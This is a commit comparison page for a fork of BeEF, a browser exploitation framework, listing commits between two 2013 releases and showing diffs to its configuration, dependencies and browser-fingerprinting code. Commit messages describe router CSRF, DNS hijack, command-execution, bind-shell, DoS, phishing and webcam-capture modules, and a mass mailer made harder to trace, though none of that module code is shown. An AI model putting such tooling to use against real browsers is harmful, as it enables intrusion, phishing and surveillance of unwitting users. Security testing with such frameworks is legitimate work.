Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.4.3
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
..
compare: Hiddenden:beef-0.4.4.6
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

102 Commits
beef-0.4.4 ... beef-0.4.4

Author SHA1 Message Date
bmantra
8cf17b01a5 Merge pull request #916 from bmantra/master 
added option to use only LF in the bind shell module for use with Linux
 2013-06-28 11:43:27 -07:00
bmantra
164ff5bea6 added option for LF only, to use with Linux 2013-06-28 20:42:53 +02:00
Michele Orru
6c6a33db50 Merge pull request #915 from Nbblrr/master 
DNS Enumeration modules does not consider the user timeout parameter
 2013-06-28 05:48:54 -07:00
Nbblrr
e95c74b5e1 DNS Enumeration module does not consider the user timeout parameter 2013-06-28 14:33:33 +02:00
Christian Frichot
0dd499c71a Updated browser detection to capture Chrome under iOS. See Issue #909 2013-06-16 16:19:58 +08:00
Christian Frichot
dab58f0e61 Updated hardware constants better detects and displays pure Nexus phones. Issue #908 2013-06-16 14:49:39 +08:00
Christian Frichot
2e68470d23 Android OS Icon should now display. See Issue #907 2013-06-16 14:27:12 +08:00
Christian Frichot
473f349394 Missing apostrophe in PHP-5.3.9-dos module.rb. This was breaking Rake. Make sure you run rake peeps before pushing! 2013-06-15 13:48:05 +08:00
Christian Frichot
dbebf12d27 Update to browser_filter. See Issue #906 2013-06-15 13:45:24 +08:00
Christian Frichot
96f763b7e0 Chrome 27/28 detection. Fixes Issue #905 2013-06-15 13:41:41 +08:00
bcoles
d40486c391 Add airlive_ip_camera_csrf module 2013-06-14 15:28:35 +09:30
Brendan Coles
d43f443555 Merge pull request #904 from Nbblrr/master 
Add modules for detecting MS Office version and Bitdefender 2012

Fix issue #902
Fix issue #903
 2013-06-13 22:38:37 -07:00
Nbblrr
2b473bfda9 Add module which detect MS Office version. Closes #903 2013-06-14 00:39:39 +02:00
Nbblrr
a2b627c8ae Add module to detect bitdefender 2012. Closes #902 2013-06-14 00:07:00 +02:00
bcoles
dbabb379fb Add Iceweasel detection in browser.js 2013-06-02 05:14:33 +09:30
bcoles
5252bea54a Add Get Form Values module 
This module retrieves the name, type, and value of all input
fields for all forms on the page.
 2013-06-02 05:11:45 +09:30
bcoles
7fdfcc3ef0 Add beef.browser.isA() to avant_steal_history module 
Part of issue #774
 2013-06-02 03:19:05 +09:30
bcoles
3c5b68e112 Add beef.browser.isA() to detect Avant Browser 
Fixes issue #774
 2013-06-02 03:14:29 +09:30
Michele Orru
9e17958268 Merge pull request #900 from james-otten/master 
Added Actiontec Q1000 router CSRF module
 2013-05-31 02:36:40 -07:00
James Otten
f2efa533c8 Added Actiontec Q1000 CSRF module 2013-05-30 15:49:47 -05:00
Christian Frichot
9636cb0972 Updated Gmail detection URL. Fixes #Issue 899 2013-05-28 20:34:56 +08:00
bcoles
1dc59f7b01 Add D-Link ShareCenter command execution exploit module 2013-05-27 13:50:12 +09:30
bcoles
ff620d42f4 Add belkin_dns_csrf DNS hijack module 
Part of issue #538
 2013-05-27 12:50:06 +09:30
bcoles
61e6337046 Remove zenoss_daemon_csrf module 2013-05-27 12:14:27 +09:30
bcoles
639d0611a6 Add command_id to embedded iframe/img IDs for router exploits 
This prevents a race condition where duplicate iframes/imgs are
created if a module is run twice simultaneously. The second iframe/img
was not being removed during `cleanup()`.
 2013-05-27 11:56:01 +09:30
bcoles
ab7a62e8a4 Update version 2013-05-27 10:40:58 +09:30
Michele Orru
71f04d82f5 Merge pull request #849 from geefunkmasterpro/master 
Enhancements to Mass Mailer
 2013-05-26 04:58:57 -07:00
bcoles
704b979054 minor syntax changes to php-5.3.9-dos module 2013-05-26 02:48:04 +09:30
bcoles
7aaafc79aa Remove bi-directional communication from IPEC win bindshell module 2013-05-26 02:41:04 +09:30
bcoles
f90ad4a261 Add detection for WebRTC support 2013-05-24 17:06:36 +09:30
bcoles
0dfab0e348 Add EXTRAnet Collaboration Tool Command Execution exploit module 2013-05-24 16:40:02 +09:30
bcoles
018a849e14 Add 'path' argument for beef.dom.createIframeIpecForm() 2013-05-24 14:01:21 +09:30
bcoles
717f63ff0c Add ruby-nntpd Command Execution exploit module 2013-05-24 13:50:04 +09:30
bcoles
9bac6b4fc1 Add support for Firefox 21 2013-05-24 13:47:31 +09:30
bcoles
2dae1d4c07 Add /bin/sh -c to default command 2013-05-22 14:37:01 +09:30
bcoles
7de48ceafb Add GroovyShell Server Command Execution IPEC exploit module 2013-05-22 02:32:27 +09:30
Brendan Coles
8ecdceb928 Merge pull request #894 from sgorbaty/master 
New functionality - detect phonegap plugins
 2013-05-09 01:59:49 -07:00
Sergey Gorbaty
498372aef3 Adding phonegap integration with keychain plugin 2013-05-08 13:18:31 -07:00
Sergey Gorbaty
55d8506960 Added primitive phonegap plugin detection 2013-05-07 17:10:12 -07:00
antisnatchor
8d60c10298 Merge branch 'master' of https://github.com/beefproject/beef 2013-05-07 13:04:19 +02:00
antisnatchor
94d15cd386 Added DOS module which allows you to send multiple GET or POST requests to a target, from a WebWorker in order to don't slow down the whole browser. 2013-05-07 13:00:34 +02:00
bcoles
5bbf26abac Add beef.http.dns_port config option 2013-05-06 16:03:17 +09:30
Brendan Coles
5b90c351da Merge pull request #888 from sgorbaty/master 
Adding new features to Phonegap module
 2013-05-05 17:26:31 -07:00
antisnatchor
b501fe7c1a Updated Rack dependency in Gemfile in order to don't create conflicts with the updated Sinatra dependency. 2013-05-04 09:42:40 +01:00
Michele Orru
b28e631500 Merge pull request #889 from 0x1a0ran/master 
Bug fix: cross-origin XHR with "Origin" or "Referrer" header set always return 403.
 2013-05-04 01:30:42 -07:00
Sergey Gorbaty
5722cb2bc1 Added email to contact list 2013-05-03 14:24:23 -07:00
Sergey Gorbaty
0479744dfc added device model detection 2013-05-03 14:14:19 -07:00
Sergey Gorbaty
3dbfdbac7e Adding user prompt 2013-05-03 14:02:53 -07:00
Sergey Gorbaty
d3262d9451 Adding local detection 2013-05-03 13:34:09 -07:00
Sergey Gorbaty
906ca6ccce Cordova detection added 2013-05-03 13:13:24 -07:00
Xiaoran Wang
ea560c3464 Added configurable port for postsql and mysql 2013-05-03 13:01:37 -07:00
Xiaoran Wang
b79402ce5f updated sinatra from 1.3.2 to 1.4.2 to fix the CORS request always return a 403 bug. link here https://github.com/sinatra/sinatra/issues/518 2013-05-03 11:02:11 -07:00
Sergey Gorbaty
1699d52475 adding contact list 2013-05-03 10:09:09 -07:00
antisnatchor
c5d5b99472 Issue #886: The preflight OPTIONS request now allow also the content-type header, required to use a json conten-type with POST requests. 2013-05-02 10:55:16 +01:00
antisnatchor
9915547b19 Issue #886: Added support for preflight OPTIONS request. 2013-05-01 17:19:48 +01:00
antisnatchor
ef2eac26eb Issue #886: Added support for CORS on the Router object. The RESTful aPI can not be called from JS x-domain. 2013-05-01 11:15:21 +01:00
bcoles
09be2db069 Update version to beef-0.4.4.5 2013-05-01 17:53:21 +09:30
bcoles
6da4e2c39c Update version to '0.4.4.4.1-alpha' bug fix edition 2013-05-01 17:49:21 +09:30
bcoles
15c7e64e93 Fix bug with module image result rendering in admin UI 2013-05-01 17:47:00 +09:30
bcoles
91e2b36ce4 Update webcam module so the picture returned as a base64 encoded string 
will be rendered in the admin UI
 2013-05-01 16:44:28 +09:30
bcoles
b82696ead2 Enabled web server imitation by default 
The time has come. This feature has been stable for a while.
 2013-05-01 16:43:26 +09:30
bcoles
7233957664 Update version 2013-04-30 18:56:37 +09:30
bcoles
88678f986c Add 'Debug -> Test Return Image' module 
Part of isse #883
 2013-04-30 18:40:25 +09:30
bcoles
719bb4a20b Fixed malformed YAML in modules/browser/get_visited_domains/config.yaml 2013-04-25 01:37:15 +09:30
antisnatchor
4ea18852f6 Updated eventmachine gem version in Gemfile. 2013-04-21 10:52:46 +01:00
qswain2
c16479a14e Add chrome support to get_visited_domains 
Added chrme implementation based on visipisi
 2013-04-19 01:02:48 -04:00
bcoles
59951959f1 Add Opencart password reset CSRF module 
This module hasn't been tested against an Opencart instance
 2013-04-19 09:18:05 +09:30
bcoles
da763df110 Uncommented several instances of beef.debug() - Part of issue #862 2013-04-17 22:12:35 +09:30
bcoles
4980ca02a6 Add beef.client.debug config property - Part of issue #862 
Client-side debugging is disabled by default

`beef.debug()` now only shows messages if `beef.client.debug` is true
 2013-04-17 22:05:31 +09:30
Christian Frichot
6e0f7a266e Issue #883. Admin UI will inline display images from the HTML5 webcam module now 2013-04-15 19:28:52 +08:00
Christian Frichot
e3cb7f7a2d #882. New HTML5 WebRTC Webcam Module 2013-04-15 19:20:48 +08:00
Christian Frichot
6e9db43463 Fixes issue #881. Console fix for reviewing previous responses 2013-04-15 19:18:07 +08:00
bcoles
a172362452 Part of issue #862 - Add beef.debug() for client-side debugging 
Add `beef.debug()` function - wraps `console.log()`

Debug messages are suppressed for browsers which don't support `console.log()`

Update './core/*' to use `beef.debug()` instead of `console.log()`
Update './modules/*' to use `beef.debug()` instead of `console.log()`
Update './extensions/*' to use `beef.debug()` instead of `console.log()`

Add 'modules/debug/test_beef_debug/' module
 2013-04-15 16:49:01 +09:30
bcoles
55b0bee9ca Re-enable XSS-Rays vectors containing ' charater 
Fix issue #47
 2013-04-14 20:38:41 +09:30
Christian Frichot
950c3d37a7 Fixes Issue #880. Detect Tor update - now works 2013-04-13 14:51:34 +08:00
Christian Frichot
1721d3c263 Fixes issue #879. Console enhancements. 2013-04-13 14:48:40 +08:00
antisnatchor
5585879cca Updated multiple core files to use hook_session_name consistently from the config.yaml file. 2013-04-09 10:25:49 +01:00
Christian Frichot
d855100ac9 Fixes #878 and #758. 2013-04-08 21:52:50 +08:00
Christian Frichot
fad33dfea7 Fixes #877. New IE Fake Notification Bar Module 2013-04-08 19:36:02 +08:00
Christian Frichot
b4732a9438 Fixes #876. Can detect Chrome 26. 2013-04-08 13:08:56 +08:00
antisnatchor
73e291832e Replacing document.location.href with location in xssrays.js. 2013-04-07 15:54:14 +01:00
antisnatchor
85b204f52b Updated beef.hardware component name for consistency. 2013-04-07 13:19:23 +01:00
antisnatchor
78410e28eb Changed attachApplet dom.js method to use <applet> also for Firefox, instead of the <embed> tag. This fixes some issues when running Signed Applets. 2013-04-06 12:30:00 +01:00
antisnatchor
222cff3f1d Added a README file for the JavaPaylod signed applet exploit. 2013-04-06 12:29:05 +01:00
Christian Frichot
2ef1b5bab8 Updates gmail phishing command module. Fixes #873 2013-04-06 15:54:55 +08:00
Christian Frichot
af67c6a8d9 Few enhancements to dom.js. See #870 #871 #872 2013-04-06 15:52:32 +08:00
Christian Frichot
79572a61f0 Renamed webcam_permission_check module 2013-04-06 14:35:21 +08:00
Christian Frichot
2fcdf1038d xntriks updates to webcam_perm_check 2013-04-06 14:32:51 +08:00
Christian Frichot
cca21f1003 Merge pull request #869 from bw-z/master 
Added Webcam Permission Check Module - which I'll then update.
 2013-04-05 23:29:21 -07:00
Christian Frichot
07fe3a9c0e Updates to tabnabbing module to use jQuerys wider event handling. #868 2013-04-04 21:33:43 +08:00
Christian Frichot
69fd3e600c Event log now logs when a zombie comes back online. #867 2013-04-04 21:29:18 +08:00
Christian Frichot
ae98842ad4 Tiny fix to Clippy so it appears properly. #866 2013-04-04 19:37:08 +08:00
bcoles
159ecb5ade Fix malformed YAML in 'deface_web_page_component' module 2013-04-04 00:04:45 +10:30
BWZ
cf4ab9533e Added Webcam Permission Check Module 2013-04-03 09:01:15 +10:00
Christian Frichot
9a23ed758e New getHighestZindex function in beef.dom and updated createIframe beef.dom function. #865 2013-04-02 14:33:57 +08:00
Christian Frichot
389f27360d Slight spelling mistake fix up in the Welcome tab of the Admin UI 2013-04-01 19:51:16 +08:00
Christian Frichot
e8eda3ef99 Minor enhancements to the Admin UI. #864 2013-04-01 11:07:50 +08:00
Saafan
af8018500b Fixing some unit tests 2013-03-31 16:22:58 +02:00
Christian Frichot
22cd68101d Added Bookmarklet to the Welcome Tab in the Admin UI. #863 2013-03-30 17:31:36 +08:00
bcoles
760e7a456e Update version 2013-03-29 15:59:48 +10:30
geefunkmasterpro
66d0e3535b Added fromaddr to mass mailer JSON interface so emails can be sent from 
any address without restart.

Removed fromaddr entry from config.yaml.
 2013-02-27 23:29:08 +11:00
geefunkmasterpro
e79372f8ac Added auth field to config so that emails are harder to track to sender 
Added error handling to identify:
  - errors creating the mail headers
  - errors processing JSON input
  - errors in the mailer configuration
 2013-02-27 21:33:48 +11:00
160 changed files with 3057 additions and 590 deletions
Expand all files Collapse all files

7
Gemfile
View File

@@ -9,13 +9,12 @@
# Gems only required on Windows, or with specific Windows issues # Gems only required on Windows, or with specific Windows issues
if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw") if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
gem "win32console" gem "win32console"
gem "eventmachine", "1.0.0.beta.4.1"
else
gem "eventmachine", "0.12.10"
end end
gem "eventmachine", "1.0.3"
gem "thin" gem "thin"
gem "sinatra", "1.3.2" gem "sinatra", "1.4.2"
gem "rack", "1.5.2"
gem "em-websocket", "~> 0.3.6" gem "em-websocket", "~> 0.3.6"
gem "jsmin", "~> 1.0.1" gem "jsmin", "~> 1.0.1"
gem "ansi" gem "ansi"

6
Rakefile
View File

@@ -76,10 +76,10 @@ end
@beef_process_id = nil; @beef_process_id = nil;
task :beef_start => 'beef' do task :beef_start => 'beef' do
printf "Starting BeEF (wait 10 seconds)..." printf "Starting BeEF (wait a few seconds)..."
@beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+") @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05] delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
delays.each do |i| # delay for 10 seconds delays.each do |i| # delay for a few seconds
printf '.' printf '.'
sleep (i) sleep (i)
end end

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission # See the file 'doc/COPYING' for copying permission
# #
0.4.4.3-alpha 0.4.4.6-alpha

1
beef
View File

@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
DataMapper.setup(:default, DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"), :adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"), :host => config.get("beef.database.db_host"),
:port => config.get("beef.database.db_port"),
:username => config.get("beef.database.db_user"), :username => config.get("beef.database.db_user"),
:password => config.get("beef.database.db_passwd"), :password => config.get("beef.database.db_passwd"),
:database => config.get("beef.database.db_name"), :database => config.get("beef.database.db_name"),

21
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file # BeEF Configuration file
beef: beef:
version: '0.4.4.3-alpha' version: '0.4.4.6-alpha'
debug: false debug: false
restrictions: restrictions:
@@ -27,12 +27,20 @@ beef:
# if running behind a nat set the public ip address here # if running behind a nat set the public ip address here
#public: "" #public: ""
#public_port: "" # port setting is experimental #public_port: "" # port setting is experimental
dns: "localhost" # DNS
dns_host: "localhost"
dns_port: 53
panel_path: "/ui/panel" panel_path: "/ui/panel"
hook_file: "/hook.js" hook_file: "/hook.js"
hook_session_name: "BEEFHOOK" hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION" session_cookie_name: "BEEFSESSION"
# Allow one or multiple domains to access the RESTful API using CORS
# For multiple domains use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible. # Prefer WebSockets over XHR-polling when possible.
websocket: websocket:
enable: false enable: false
@@ -43,14 +51,14 @@ beef:
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header) # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation: web_server_imitation:
enable: false enable: true
type: "apache" #supported: apache, iis type: "apache" #supported: apache, iis
# Experimental HTTPS support for the hook / admin / all other Thin managed web services # Experimental HTTPS support for the hook / admin / all other Thin managed web services
https: https:
enable: false enable: false
# In production environments, be sure to use a valid certificate signed for the value # In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns (the domain name of the server where you run BeEF) # used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem" key: "beef_key.pem"
cert: "beef_cert.pem" cert: "beef_cert.pem"
@@ -72,6 +80,7 @@ beef:
# db connection information is only used for mysql/postgres # db connection information is only used for mysql/postgres
db_host: "localhost" db_host: "localhost"
db_port: 5432
db_name: "beef" db_name: "beef"
db_user: "beef" db_user: "beef"
db_passwd: "beef123" db_passwd: "beef123"
@@ -91,6 +100,10 @@ beef:
crypto_default_value_length: 80 crypto_default_value_length: 80
# Enable client-side debugging
client:
debug: false
# You may override default extension configuration parameters here # You may override default extension configuration parameters here
extension: extension:
requester: requester:

6
core/filters/browser.rb
View File

@@ -22,7 +22,7 @@ module Filters
def self.is_valid_browsertype?(str) def self.is_valid_browsertype?(str)
return false if not is_non_empty_string?(str) return false if not is_non_empty_string?(str)
return false if str.length < 10 return false if str.length < 10
return false if str.length > 50 return false if str.length > 250
return false if has_non_printable_char?(str) return false if has_non_printable_char?(str)
true true
end end
@@ -123,9 +123,9 @@ module Filters
return true if not is_non_empty_string?(str) return true if not is_non_empty_string?(str)
return false if str.length > 1000 return false if str.length > 1000
if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8') if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil? return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
else else
return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil? return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
end end
end end

16
core/main/client/beef.js
View File

@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
// An array containing all the BeEF JS components. // An array containing all the BeEF JS components.
components: new Array(), components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
if (!<%= @client_debug %>) return;
if (typeof console == "object" && typeof console.log == "function") {
console.log(msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/** /**
* Adds a function to execute. * Adds a function to execute.
* @param: {Function} the function to execute. * @param: {Function} the function to execute.

326
core/main/client/browser.js
View File

@@ -19,6 +19,22 @@ beef.browser = {
return navigator.userAgent; return navigator.userAgent;
}, },
/**
* Returns true if Avant Browser.
* @example: beef.browser.isA()
*/
isA:function () {
return window.navigator.userAgent.match(/Avant TriCore/) != null;
},
/**
* Returns true if Iceweasel.
* @example: beef.browser.isI()
*/
isI:function () {
return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
},
/** /**
* Returns true if IE6. * Returns true if IE6.
* @example: beef.browser.isIE6() * @example: beef.browser.isIE6()
@@ -236,12 +252,20 @@ beef.browser = {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null; return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
}, },
/**
* Returns true if FF21
* @example: beef.browser.isFF21()
*/
isFF21:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
},
/** /**
* Returns true if FF. * Returns true if FF.
* @example: beef.browser.isFF() * @example: beef.browser.isFF()
*/ */
isFF:function () { isFF:function () {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20(); return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
}, },
/** /**
@@ -396,6 +420,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false); return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
}, },
/**
* Returns true if Chrome for iOS 19.
* @example: beef.browser.isC19iOS()
*/
isC19iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
},
/** /**
* Returns true if Chrome 20. * Returns true if Chrome 20.
* @example: beef.browser.isC20() * @example: beef.browser.isC20()
@@ -404,6 +436,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false); return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
}, },
/**
* Returns true if Chrome for iOS 20.
* @example: beef.browser.isC20iOS()
*/
isC20iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
},
/** /**
* Returns true if Chrome 21. * Returns true if Chrome 21.
* @example: beef.browser.isC21() * @example: beef.browser.isC21()
@@ -412,6 +452,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false); return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
}, },
/**
* Returns true if Chrome for iOS 21.
* @example: beef.browser.isC21iOS()
*/
isC21iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
},
/** /**
* Returns true if Chrome 22. * Returns true if Chrome 22.
* @example: beef.browser.isC22() * @example: beef.browser.isC22()
@@ -420,6 +468,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false); return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
}, },
/**
* Returns true if Chrome for iOS 22.
* @example: beef.browser.isC22iOS()
*/
isC22iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
},
/** /**
* Returns true if Chrome 23. * Returns true if Chrome 23.
* @example: beef.browser.isC23() * @example: beef.browser.isC23()
@@ -428,6 +484,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false); return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
}, },
/**
* Returns true if Chrome for iOS 23.
* @example: beef.browser.isC23iOS()
*/
isC23iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
},
/** /**
* Returns true if Chrome 24. * Returns true if Chrome 24.
* @example: beef.browser.isC24() * @example: beef.browser.isC24()
@@ -436,6 +500,14 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false); return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
}, },
/**
* Returns true if Chrome for iOS 24.
* @example: beef.browser.isC24iOS()
*/
isC24iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
},
/** /**
* Returns true if Chrome 25. * Returns true if Chrome 25.
* @example: beef.browser.isC25() * @example: beef.browser.isC25()
@@ -444,12 +516,68 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false); return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
}, },
/**
* Returns true if Chrome for iOS 25.
* @example: beef.browser.isC25iOS()
*/
isC25iOS:function () {
